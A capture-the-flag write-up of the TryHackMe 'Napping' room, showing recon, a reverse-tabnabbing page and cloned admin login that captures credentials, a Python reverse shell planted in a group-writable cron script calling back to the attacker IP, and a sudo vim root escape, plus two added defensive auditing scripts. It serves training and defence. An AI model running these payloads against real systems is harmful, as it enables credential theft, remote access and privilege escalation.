
Napping - THM

This is the writeup for the TryHackMe medium difficulty room called Napping.

Task

Recon

CMD: nmap -sS -sV -p- $IP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-07 19:22 CEST
Nmap scan report for 10.10.167.48
Host is up (0.043s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

The nmap scan shows a web server on port 80 and an SSH server on port 22.

Login_Page SignUp_Page

After registering a user and signing in we get access to the welcome.php page.

Welcome

On this page we can submit the URL of our blog site, and an admin is going to take a look at it.

Source

The source code of the page after submitting a URL shows that the link is rendered as an anchor tag with the target='_blank' attribute, so it opens in a new tab.
From this we can assume that the admin on the other side opens our URL the same way we do.

CMD: ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://$IP/admin/FUZZ.php -v

v2.1.0-dev
________________________________________________
 :: Method           : GET
 :: URL              : http://10.10.167.48/admin/FUZZ.php
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
...
[Status: 200, Size: 1158, Words: 319, Lines: 39, Duration: 44ms]
| URL | http://10.10.167.48/admin/login.php
    * FUZZ: login

During the enumeration of the site we found an admin login page. So what we are going to do is somehow make the admin hand us his credentials.

Exploitation

One way of doing so is to swap the page the admin currently has open for our malicious copy of the original admin login page.

site.html
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Our Blog Site</title>
  </head>
  <body>
    <script>
      window.opener.location = "http://10.14.99.147/login.html";
    </script>
  </body>
</html>

The window.opener variable refers to the tab which opened our site in a new tab through the anchor tag with the target='_blank' attribute. By changing the URL (location) of the opener tab we can trick the admin into signing in on our crafted admin login page. This technique is known as reverse tabnabbing.
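The welcome.php page is vulnerable because it renders a user-supplied URL as a target='_blank' link without rel="noopener", which is what hands window.opener to the blog page. The following is an added example (not code from the room or the writeup) that audits HTML for that pattern and shows the hardened way to render such a link; the sample snippet and the URL blog.example are constructed.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit


class BlankTargetAuditor(HTMLParser):
    """Collect hrefs of <a target="_blank"> links whose rel lacks noopener/noreferrer."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("target", "").strip().lower() != "_blank":
            return
        rel = set(a.get("rel", "").lower().split())
        if not rel & {"noopener", "noreferrer"}:
            self.findings.append(a.get("href", ""))


def find_unsafe_blank_links(html: str) -> list:
    """Return hrefs of new-tab links that expose window.opener to the opened page."""
    parser = BlankTargetAuditor()
    parser.feed(html)
    return parser.findings


def is_acceptable_blog_url(url: str) -> bool:
    """Only absolute http(s) URLs; rejects javascript:, data: and relative paths."""
    parts = urlsplit(url.strip())
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def render_blog_link(url: str) -> str:
    """Hardened rendering of a user-submitted URL as a new-tab link.

    rel="noopener noreferrer" makes window.opener null in the opened tab, so the
    blog page cannot redirect the reviewer's tab; html.escape keeps the value
    from breaking out of the attribute.
    """
    if not is_acceptable_blog_url(url):
        raise ValueError("only absolute http(s) URLs are accepted")
    safe = escape(url.strip(), quote=True)
    return f'<a href="{safe}" target="_blank" rel="noopener noreferrer">{safe}</a>'


# Constructed sample mirroring the vulnerable pattern; not the real welcome.php markup.
VULNERABLE_SNIPPET = "<p>Your blog: <a href='http://blog.example/site.html' target='_blank'>link</a></p>"
```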

login.html
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <title>Login</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" />
    <style>
      body { font: 14px sans-serif; }
      .wrapper { width: 360px; padding: 20px; }
    </style>
  </head>
  <body>
    <div class="wrapper">
      <h2>Admin Login</h2>
      <p>Please fill in your credentials to login.</p>
      <form action="/admin/login.php" method="post">
        <div class="form-group">
          <label>Username</label>
          <input type="text" name="username" class="form-control" value="" />
          <span class="invalid-feedback"></span>
        </div>
        <div class="form-group">
          <label>Password</label>
          <input type="password" name="password" class="form-control" />
          <span class="invalid-feedback"></span>
        </div>
        <div class="form-group">
          <input type="submit" class="btn btn-primary" value="Login" />
        </div>
        <br />
      </form>
    </div>
  </body>
</html>

Now we start a Python HTTP server and launch Wireshark to capture the admin's POST request.

CMD: python -m http.server 80

After submitting our malicious blog URL http://10.14.99.147/site.html and waiting a bit, we get a POST request from the admin containing his credentials.

Credentials

Using these credentials we can log in to the machine via SSH.

Getting the User Flag

CMD: ./pspy

pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/10/07 17:07:31 CMD: UID=1001 PID=67689 | ./pspy
2025/10/07 17:07:31 CMD: UID=0    PID=67666 | ...
2025/10/07 17:08:01 CMD: UID=1000 PID=67701 | /usr/bin/python3 /home/adrian/query.py
2025/10/07 17:08:01 CMD: UID=0    PID=67705 | ...
2025/10/07 17:09:01 CMD: UID=0    PID=67721 |
2025/10/07 17:09:01 CMD: UID=1000 PID=67720 | /usr/bin/python3 /home/adrian/query.py

By running the tool pspy, we see that a Python script in adrian's home directory is executed every minute as UID 1000 (adrian).

daniel@ip-10-10-167-48:/home/adrian$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel),1002(administrators)
daniel@ip-10-10-167-48:/home/adrian$ ls -la
total 40
drwxr-xr-x 4 adrian adrian          4096 Oct  7 17:20 .
drwxr-xr-x 5 root   root            4096 Oct  7 14:54 ..
...
-rw------- 1 adrian adrian             0 Mar 16  2022 .viminfo
-rw-rw-r-- 1 adrian administrators   142 Oct  7 17:15 query.py
-rw-r----- 1 root   adrian            56 Mar 16  2022 user.txt

Taking a close look at the file, we find that it is group-writable by administrators, and daniel is a member of that group, so we can modify it.

query.py
import sys,socket,os,pty; s=socket.socket(); s.connect(("10.14.99.147",9998)); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/bash")
CMD: nc -lvnp 9998

After changing the contents of the Python file to a reverse shell and starting a listener, we get a shell back as adrian the next time the script runs.
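The root cause on this box is a scheduled script that runs as one user but can be written by another. As an added example (not part of the writeup or the room), the following audit reproduces query.py's permissions (-rw-rw-r--, group-writable) on a constructed temporary file and evaluates them from the viewpoint of a non-owner who belongs to the file's group, checking both the file and whether the parent directory would let it be replaced.

```python
import os
import stat
import tempfile


def can_modify(st: os.stat_result, uid: int, gids: set) -> bool:
    """True if a principal with this uid and group set may write the inode in `st`.
    Root is deliberately not special-cased here; it can always write."""
    mode = st.st_mode
    if st.st_uid == uid:
        return bool(mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def can_replace_via_parent(path: str, uid: int, gids: set) -> bool:
    """A writable parent directory lets the file be renamed away and replaced,
    unless the directory is sticky and owned by someone else (as /tmp is)."""
    parent = os.path.dirname(os.path.abspath(path))
    st = os.stat(parent)
    if not can_modify(st, uid, gids):
        return False
    return not (st.st_mode & stat.S_ISVTX and st.st_uid != uid)


def audit_scheduled_script(path: str, uid: int, gids: set) -> list:
    """Findings for a script a scheduler runs as someone other than `uid`."""
    findings = []
    if can_modify(os.stat(path), uid, gids):
        findings.append("script content writable")
    if can_replace_via_parent(path, uid, gids):
        findings.append("script replaceable via parent directory")
    return findings


def demo_query_py(in_group: bool = True) -> list:
    """Constructed replica of the page's query.py permissions, checked for a
    non-owner who is (or is not) a member of the file's group."""
    d = tempfile.mkdtemp()
    os.chmod(d, 0o755)  # like /home/adrian: drwxr-xr-x
    p = os.path.join(d, "query.py")
    with open(p, "w") as f:
        f.write("print('scheduled task')\n")
    os.chmod(p, 0o664)  # like query.py: -rw-rw-r--
    st = os.stat(p)
    other_uid = st.st_uid + 1  # some user other than the owner
    gids = {st.st_gid} if in_group else {st.st_gid + 100000}
    return audit_scheduled_script(p, other_uid, gids)
```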

User_Flag

The USER FLAG is found in the home directory of adrian.

Getting the Root Flag

adrian@ip-10-10-167-48:~$ sudo -l
Matching Defaults entries for adrian on ip-10-10-167-48:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User adrian may run the following commands on ip-10-10-167-48:
    (root) NOPASSWD: /usr/bin/vim

adrian may also run vim as root without a password, which we can leverage to our advantage.
Let's look it up on GTFOBins.

CMD: sudo vim -c ':!/bin/sh'

Executing this command drops us into a shell as root.

Root_Flag

The ROOT FLAG is in /root.
